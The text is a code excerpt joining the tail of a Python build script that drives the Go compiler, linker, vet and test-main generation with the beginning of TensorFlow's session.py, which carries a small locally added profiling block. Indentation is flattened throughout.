content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
# Temporary work around for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = [x for x in args.srcs if x not in cgo_srcs_set]
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
# add lexical oreder by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
v1 = tuple(str(int(x)).zfill(8) for x in version1.split('.'))
v2 = tuple(str(int(x)).zfill(8) for x in version2.split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
def call(cmd, cwd, env=None):
# sys.stderr.write('{}\n'.format(' '.join(cmd)))
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = [x for x in srcs if x.endswith('.go')]
args.asm_srcs = [x for x in srcs if x.endswith('.s')]
args.objects = [x for x in srcs if x.endswith('.o') or x.endswith('.obj')]
args.symabis = [x for x in srcs if x.endswith('.symabis')]
args.sysos = [x for x in srcs if x.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in six.iteritems(import_map):
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in six.iteritems(module_map):
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# sys.stderr.writelines('{}\n'.format(l) for l in lines)
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content)
return f.name
return None
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding import map for 'fake' package
# does't make any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': [x for x in args.go_srcs if x.endswith('.go')],
'NonGoFiles': [x for x in args.go_srcs if not x.endswith('.go')],
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder(encoding='UTF-8').decode(json_report)
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in six.iteritems(full_diags):
for _, type_diags in six.iteritems(module_diags):
for diag in type_diags:
messages.append(u'{}: {}'.format(diag['posn'], diag['message']))
report = '\n'.join(sorted(messages)).encode('UTF-8')
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), [_f for _f in test_args_list if _f], ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# sys.stderr.write('>>>> [{}]\n'.format(' '.join(cmd)))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
if is_std_module:
cmd.append('-std')
if import_path == 'runtime' or import_path.startswith('runtime/internal/'):
cmd.append('-+')
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
if compare_versions('1.12', args.goversion) >= 0:
if args.symabis:
cmd += ['-symabis'] + args.symabis
if compare_versions('1.13', args.goversion) >= 0:
pass
elif import_path in ('runtime', 'runtime/internal/atomic'):
cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if import_path == 'runtime' or import_path.startswith('runtime/'):
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any([x in ('-race', '-shared') for x in args.compile_flags]):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any([x.startswith(build_info) for x in compile_args.peers]):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
filter_musl = bool
if args.musl:
cmd.append('-linkmode=external')
extldflags.append('-static')
filter_musl = lambda x: not x in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += [x for x in args.extldflags if filter_musl(x)]
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def filter_out_skip_tests(tests, skip_tests):
skip_set = set()
star_skip_set = set()
for t in skip_tests:
work_set = star_skip_set if '*' in t else skip_set
work_set.add(t)
re_star_tests = None
if len(star_skip_set) > 0:
re_star_tests = re.compile(re.sub(r'(\*)+', r'.\1', '^({})$'.format('|'.join(star_skip_set))))
return [x for x in tests if not (x in skip_tests or re_star_tests and re_star_tests.match(x))]
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = [x for x in (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
tests = filter_out_skip_tests(tests, args.skip_tests)
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = [x for x in (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n') if len(x) > 0]
if args.skip_tests:
xtests = filter_out_skip_tests(xtests, args.skip_tests)
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
elif test_lib_args:
lines.append(' _ "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
elif xtest_lib_args:
lines.append(' _ "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
for kind in ['Test', 'Benchmark', 'Example']:
lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
for test in [x for x in tests if x.startswith(kind)]:
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in [x for x in xtests if x.startswith(kind)]:
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)'
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# sys.stderr.write('{}\n'.format(content))
return content
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = copy_args(args) if args.srcs else None
xtest_lib_args = copy_args(args) if args.xtest_srcs else None
ydx_file_name = None
xtest_ydx_file_name = None
need_append_ydx = test_lib_args and xtest_lib_args and args.ydx_file and args.vet_flags
if need_append_ydx:
def find_ydx_file_name(name, flags):
for i, elem in enumerate(flags):
if elem.endswith(name):
return (i, elem)
assert False, 'Unreachable code'
idx, ydx_file_name = find_ydx_file_name(xtest_lib_args.ydx_file, xtest_lib_args.vet_flags)
xtest_ydx_file_name = '{}_xtest'.format(ydx_file_name)
xtest_lib_args.vet_flags = copy.copy(xtest_lib_args.vet_flags)
xtest_lib_args.vet_flags[idx] = xtest_ydx_file_name
if test_lib_args:
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if xtest_lib_args:
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
need_append_ydx = args.ydx_file and args.srcs and args.vet_flags
do_link_lib(xtest_lib_args)
if need_append_ydx:
with open(os.path.join(args.build_root, ydx_file_name), 'ab') as dst_file:
with open(os.path.join(args.build_root, xtest_ydx_file_name), 'rb') as src_file:
dst_file.write(src_file.read())
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we can do it unconditionally, but this kind
# of mangling doesn't really looks good to me and we leave it
# for pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
# Support @response-file notation for windows to reduce cmd length
if sys.argv[1].startswith('@'):
with open(sys.argv[1][1:]) as afile:
args = afile.read().splitlines()
sys.argv[:] = [sys.argv[0]] + args + sys.argv[2:]
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['dll', 'exe', 'lib', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++source-root', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++tools-root', default=None)
parser.add_argument('++output-root', required=True)
parser.add_argument('++toolchain-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++vet-info-ext', default=vet_info_ext)
parser.add_argument('++vet-report-ext', default=vet_report_ext)
parser.add_argument('++musl', action='store_true')
parser.add_argument('++skip-tests', nargs='*', default=None)
parser.add_argument('++ydx-file', default='')
parser.add_argument('++debug-root-map', default=None)
args = parser.parse_args()
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
vet_info_ext = args.vet_info_ext
vet_report_ext = args.vet_report_ext
preprocess_args(args)
try:
os.unlink(args.output)
except OSError:
pass
# We are going to support only 'lib', 'exe' and 'cgo' build modes currently
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'exe': do_link_exe,
'dll': do_link_exe,
'lib': do_link_lib,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
sys.stderr.write('Unknown build mode [{}]...\n'.format(args.mode))
except subprocess.CalledProcessError as e:
sys.stderr.write('{} returned non-zero exit code {}.\n{}\n'.format(' '.join(e.cmd), e.returncode, e.output))
exit_code = e.returncode
except Exception as e:
sys.stderr.write('Unhandled exception [{}]...\n'.format(str(e)))
sys.exit(exit_code)
|
session.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import re
import threading
import warnings
import numpy as np
import tensorflow as tf
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util import object_identity
from tensorflow.python.util.tf_export import tf_export
from tensorflow.python.util.compat import collections_abc
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
#fareed
import os
import json
from graphviz import Digraph
from graphviz import Source
from tensorflow.python.client import timeline
the_settings_file_was_read = False
training_itr = 0
profile = False
profiling_path = ''
def _profile(run_metadata, epoch=0):
with open(profiling_path + 'timeline_step' + str(epoch) + '.json', 'w') as f:
# Create the Timeline object, and write it to a json file
fetched_timeline = timeline.Timeline(run_metadata.step_stats)
chrome_trace = fetched_timeline.generate_chrome_trace_format()
f.write(chrome_trace)
def graph_to_dot(graph):
dot = Digraph()
for n in graph.as_graph_def().node:
dot.node(n.name, label= n.name)
for i in n.input:
dot.edge(i, n.name)
return dot
#end fareed
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
